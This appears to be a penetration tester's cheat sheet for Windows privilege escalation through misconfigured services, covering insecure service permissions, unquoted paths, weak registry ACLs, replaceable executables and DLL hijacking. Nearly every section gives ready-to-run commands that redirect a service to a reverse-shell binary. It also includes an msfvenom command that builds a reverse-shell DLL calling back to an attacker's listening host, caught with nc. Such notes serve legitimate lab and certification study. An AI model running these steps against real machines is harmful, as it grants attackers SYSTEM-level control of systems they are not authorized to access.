Services

Introduction

Dealing with services:

# query the service config:
sc.exe qc <name>

# query the current service status:
sc.exe query <name>

# modify a service config option:
sc.exe config <name> <option>= <value>

# service start/stop:
net start/stop <name>

Rabbit Hole Even if you can edit options, make sure can also start/stop services (or at least restart the system), otherwise there's nothing you can do.

Insecure Service Properties

  1. Use winPEAS to enumerate services and see if there are any modifiable
.\winPEASany.exe quiet serviceinfo
  1. Confirm permissions to that service with the accesschk (to see if you can also start/stop it):
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  1. Query the service current config:
  • check the BINARY_PATH_NAME
  • make sure it runs as system user (SERVICE_START_NAME field)
sc qc <service_name>
  1. Set the binry path of the service to the revshell binary and restart the service:
sc config <service_name> binpath= "\"C:\revshell.exe\""
  1. Start nc on kali
  2. Restart the service:
net stop <service_name>
net start <service_name>

Unquoted Service Path

  1. Use winPEAS to enumerate services with unquoted paths
.\winPEASany.exe quiet serviceinfo
  1. Confirm permissions to that service with the accesschk (to see if you can also start/stop it):
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  1. Use accesschk.exe to check if you can write to the unquoted paths of that service:
.\accesschk.exe /accepteula -uwdq "<unquoted_path>" # e.g. "C:\Program Files\"

Look for entry: RW BUILDIN\Users 4. Copy your revshell.exe to the location somewhere in the path and rename it to the first part of the unquoted path. 5. Start nc on kali 6. Restart the service:

net stop <service_name>
net start <service_name>

Weak Registry Permissions

  1. Use winPEAS to enumerate services for which we can modify registry entries
.\winPEASany.exe quiet serviceinfo
  1. Verify that with either powershell or accesschk:
powershell -exec bypass

Get-Acl <registry_path> | Format-List

# or

.\accesschk.exe /accepteula -uvwqk <registry_path>

Look for RW NT AUTHORITY\INTERACTIVE entries. 3. Confirm permissions to that service with the accesschk (to see if you can also start/stop it):

.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  1. Check current values in the service registry:
req query <registry_path>

Look for ImagePath to update it and make sure the ObjectName contains System. 5. Override ImagePath value with the revshell.exe:

reg add <registry_path> /v ImagePath /t REG_EXPAND_SZ /d C:\revshell.exe /f
  1. Start nc on kali
  2. Restart the service:
net stop <service_name>
net start <service_name>

Insecure Service Executables

  1. Use winPEAS to enumerate services for which we can override its executable:
.\winPEASany.exe quiet serviceinfo
  1. Verify this with accesschk:
.\accesschk.exe /accepteula -quvw "<service_executable>"

Look for RW Everyone or your user/group 3. Confirm permissions to that service with the accesschk (to see if you can also start/stop it):

.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  1. Backup the original service executable
  2. Replace the service executable with your revshell
  3. Start nc on kali
  4. Restart the service:
net stop <service_name>
net start <service_name>

DLL Hijacking

  1. Use winPEAS to enumerate non-Micrrosoft services and for a folder that is writable and in the PATH variable:
.\winPEASany.exe quiet serviceinfo
  1. Check which of those services we have privileges to stop/start
.\accesschk.exe /accepteula -uwcqv <username> <service_name>
  1. Check which binary this service is executing and copy it to your environment for analysis.
  2. Use Procmon to check which dlls are loading upon service start. There should be NAME NOT FOUND entries which show how Windows is trying to find and load DLL from different locations. If we find an entry to which we have write access, we can place our malicious DLL.
  3. Generate revshell with the format set to dll:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f dll -o <dll_name.dll>
  1. Replace the dll on the target.
  2. Start nc on kali
  3. Restart the service:
net stop <service_name>
net start <service_name>